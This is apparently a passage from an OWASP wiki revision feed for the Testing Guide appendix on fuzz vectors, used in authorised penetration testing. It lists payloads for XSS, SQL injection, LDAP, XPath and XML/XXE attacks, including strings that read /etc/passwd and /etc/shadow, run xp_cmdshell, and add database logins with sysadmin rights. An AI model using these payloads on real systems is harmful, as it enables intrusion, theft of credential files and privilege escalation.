 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&lt;br /&gt;
 &amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&lt;br /&gt;
 &amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;           &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&lt;br /&gt;
 &amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows and Format String Errors ===&lt;br /&gt;
&lt;br /&gt;
==== Buffer Overflows (BFO) ====&lt;br /&gt;
A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.&lt;br /&gt;
&lt;br /&gt;
For details on Buffer Overflows: [[Buffer_Overflow_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Format String Errors (FSE) ====&lt;br /&gt;
&lt;br /&gt;
Format string attacks are a class of vulnerabilities which involve supplying language specific format tokens in order to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input.&lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%p%x%d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;.1024d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%.2049d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Integer Overflows (INT) ====&lt;br /&gt;
&lt;br /&gt;
Integer overflow errors occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type's maximum value or less than its minimum value. If an attacker can cause the program to perform such a memory allocation, the program can be potentially vulnerabie to a buffer overflow attack.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on Testing SQL Injection: [[Testing_for_SQL_Injection]]&lt;br /&gt;
&lt;br /&gt;
==== Passive SQL Injection (SQP) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'||(elt(-3+5,bin(15),ord(10),hex(char(45))))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;||6&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'||'6&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;(||6)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt; &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; &lt;br /&gt;
 @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Active SQL Injection (SQI) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) &lt;br /&gt;
 + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== LDAP Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on LDAP Injection: [[LDAP_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;|&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;!&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;(&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%28&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%26&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%21&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%7C&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*|&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%7C&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*(|(mail=*))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%28%7C%28mail%3D%2A%29%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*(|(objectclass=*))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%28%7C%28objectclass%3D%2A%29%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*()|%26'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;admin*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;admin*)((|userPassword=*)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*)(uid=*))(|(uid=*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XPATH Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on XPATH Injection: [[XPath_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'+or+'1'='1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'+or+''='&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;x'+or+1=1+or+'x'='y&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;/&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;//&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;//*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*/*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;@*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;count(/child::node())&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;x'+or+name()='username'+or+'x'='y&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Injection ===&lt;br /&gt;
&lt;br /&gt;
Details on XML Injection here: [[XML_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;![CDATA[&amp;lt;script&amp;gt;var n=0;while(true){n++;}&amp;lt;/script&amp;gt;]]&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[&amp;lt;]]&amp;gt;SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;alert('gotcha');&amp;lt;![CDATA[&amp;lt;]]&amp;gt;/SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[' or 1=1 or ''=']]&amp;gt;&amp;lt;/foof&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file://c:/boot.ini&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/shadow&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///dev/random&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=14336</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=14336"/>
				<updated>2006-12-13T23:46:17Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: /* Format String Errors (FSE) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replacive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replacive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
